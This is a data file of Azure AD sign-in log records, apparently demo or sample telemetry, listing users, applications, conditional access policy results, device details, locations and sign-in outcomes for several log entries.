+618,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:07.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9e3c9072-0960-4254-a07f-01e864e6ec9e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e446f264-3933-463f-bc0b-d422ca122000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e446f264-3933-463f-bc0b-d422ca122000,SigninLogs,Sucess,33.7984581,-84.38828278
+619,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:33.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,436a19a5-f081-475a-b681-5d0732c96e25,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",19d407b5-d6ca-4d06-b044-cfca0f411e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,19d407b5-d6ca-4d06-b044-cfca0f411e00,SigninLogs,Sucess,36.6404686,-78.26995087
+620,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:12.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,0b636dbf-fe9e-4895-97d5-311a7b003a0f,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",6f905d6a-b8b5-48fe-8361-59d7f8921d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6f905d6a-b8b5-48fe-8361-59d7f8921d00,SigninLogs,Failed,33.45851135,-82.21336365
+621,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:07.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1f2e17e-30b6-4474-baa7-f2318e7976fa,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:01,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Edge 80.0.361', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",9c4099ed-f52f-4189-99d1-f7c426a50000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9c4099ed-f52f-4189-99d1-f7c426a50000,SigninLogs,Sucess,32.32146072,34.85319901
+622,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:13.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d500250d-b3b4-4a6e-b372-2e6f71005347,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c27bb27f-6b5f-4aa7-85e4-b0d879651c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c27bb27f-6b5f-4aa7-85e4-b0d879651c00,SigninLogs,Sucess,33.7984581,-84.38828278
+623,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:15.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0b636dbf-fe9e-4895-97d5-311a7b003a0f,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ac9a90bc-e2ad-45f7-b2a8-b41593801d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ac9a90bc-e2ad-45f7-b2a8-b41593801d00,SigninLogs,Sucess,33.45851135,-82.21336365
+624,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:11.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,0b94c998-5c08-46bf-a624-ec31a5001473,Microsoft.aadiam,Microsoft.aadiam,,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,4,US,Azure App Service Resource,5e1ba54d-4504-4799-9600-6d05e58f0682,Browser,[],notApplied,09/04/2020 18:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",abcfb4a9-99af-471d-ae56-97bf35d20300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",95289cbf-4ab6-46f3-804b-c9a6f2ef1227,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,abcfb4a9-99af-471d-ae56-97bf35d20300,SigninLogs,Failed,38.47222137,-77.41989899
+625,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:38.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:02,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",3341be53-51ae-497a-816e-4862010a2f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3341be53-51ae-497a-816e-4862010a2f00,SigninLogs,Sucess,47.47483063,-122.1431198
